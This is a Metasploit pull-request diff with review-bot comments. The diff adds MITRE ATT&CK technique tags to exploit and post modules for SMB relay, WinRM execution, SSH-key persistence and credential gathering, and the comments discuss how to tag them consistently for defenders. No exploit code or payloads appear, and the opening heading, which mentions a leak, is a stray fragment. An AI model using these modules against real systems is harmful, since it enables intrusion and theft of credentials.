# Shadow Brokers leak 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index cbb333fb02..c2dc694013 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -83,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote ['MSB', 'MS08-068'], ['URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'], ['URL', 'https://en.wikipedia.org/wiki/SMBRelay'], - ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'] + ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', 
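Review bot: `smb_doublepulsar_rce.rb` gets the parent `T1021_REMOTE_SERVICES`, while `rdp_doublepulsar_rce.rb` gets `T1021_001_REMOTE_DESKTOP_PROTOCOL` and the neighbouring SMB modules get `T1021_002_SMB_WINDOWS_ADMIN_SHARES`. Whichever mapping is chosen, the two DoublePulsar modules should be tagged at the same level so that filtering by sub-technique returns both; for the SMB one that would be `['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]`. The same parent/sub-technique split appears between `post/linux/manage/sshkey_persistence.rb` (parent) and `post/windows/manage/sshkey_persistence.rb` (`T1021_004_SSH`), and between `rdc_manager_creds.rb` (parent) and `mremote.rb` (`T1021_001_REMOTE_DESKTOP_PROTOCOL`).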
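Review bot: `smb_relay.rb` is tagged only with `T1021_002_SMB_WINDOWS_ADMIN_SHARES`, which covers use of a share with valid credentials; the relay step that its MS08-068 and SMBRelay references point to is catalogued separately as T1557.001 (LLMNR/NBT-NS Poisoning and SMB Relay). Adding `['ATT&CK', Mitre::Attack::Technique::<constant for T1557.001>]` next to the new line would let defenders tie the module to relay detections as well. `smb_shadow.rb` in the next file appears to be in the same position, going by its "SMB shadow attack" reference.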
diff --git a/modules/exploits/windows/smb/smb_shadow.rb b/modules/exploits/windows/smb/smb_shadow.rb index 27f776a44c..c554def21d 100644 --- a/modules/exploits/windows/smb/smb_shadow.rb +++ b/modules/exploits/windows/smb/smb_shadow.rb @@ -38,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => {}, 'References' => [ - ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'] + ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 2842e36820..5e0ac8626a 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote ['OSVDB', '88006'], ['BID', '56785'], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'], - ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'] + ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Platform' => 'win', 'Privileged' => true, diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 6833d456d7..8df54ecc7d 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ], ], 'Privileged' => true, 'DefaultOptions' => { 
diff --git a/modules/post/linux/manage/sshkey_persistence.rb b/modules/post/linux/manage/sshkey_persistence.rb index d87ebacfc7..ea12d45c9a 100644 --- a/modules/post/linux/manage/sshkey_persistence.rb +++ b/modules/post/linux/manage/sshkey_persistence.rb @@ -37,7 +37,10 @@ class MetasploitModule < Msf::Post stdapi_fs_separator ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] + ] ) ) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index b78df4ad99..9a0b79e659 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -23,7 +23,10 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] + ] ) ) end diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 4e09ec5286..944a55ebf3 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -33,7 +33,12 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) ) end diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index da9b5ba7cc..e4fcc396c3 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb 
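Review bot: The post modules under `gather/` (`vnc_password_osx.rb` and `credentials/mremote.rb` here, `credentials/rdc_manager_creds.rb` further down) are tagged with T1021 entries, which describe using a remote service, not collecting its stored credentials. Going by their paths these modules read saved passwords, which ATT&CK places under T1555 (Credentials from Password Stores) or T1552 (Unsecured Credentials); a line such as `[ 'ATT&CK', Mitre::Attack::Technique::<constant for T1555> ]` would describe what actually runs on the host. The `sshkey_persistence.rb` modules likewise look like a fit for T1098.004 (SSH Authorized Keys) alongside the remote-service entry, since that is the technique defenders monitor `authorized_keys` changes for.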
@@ -51,7 +51,10 @@ class MetasploitModule < Msf::Post stdapi_sys_process_memory_write ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] + ] ) ) end diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index 446b93b1bd..3c22f2ff73 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -28,7 +28,10 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [CONFIG_CHANGES], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ] + ] ) ) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index e794bd7fa6..a2f3e6cc20 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -43,7 +43,10 @@ class MetasploitModule < Msf::Post extapi_pageant_send_query ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) ) register_options([ diff --git a/modules/post/windows/manage/install_ssh.rb b/modules/post/windows/manage/install_ssh.rb index 0bba0056f9..8e5dc256d1 100644 --- a/modules/post/windows/manage/install_ssh.rb +++ b/modules/post/windows/manage/install_ssh.rb @@ -24,7 +24,8 @@ class MetasploitModule < Msf::Post 'SessionTypes' => [ 'meterpreter', 'shell' ], 'References' => [ ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'], - ['URL', 'https://github.com/PowerShell/openssh-portable'] + ['URL', 'https://github.com/PowerShell/openssh-portable'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index d7b81464d9..a4d96e358b 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb 
+++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -22,7 +22,8 @@ class MetasploitModule < Msf::Post 'License' => MSF_LICENSE, 'Author' => 'Borja Merino ', 'References' => [ - [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ] + [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], diff --git a/modules/post/windows/manage/sshkey_persistence.rb b/modules/post/windows/manage/sshkey_persistence.rb index c634cf5bd3..e14975d2cf 100644 --- a/modules/post/windows/manage/sshkey_persistence.rb +++ b/modules/post/windows/manage/sshkey_persistence.rb @@ -38,7 +38,10 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) )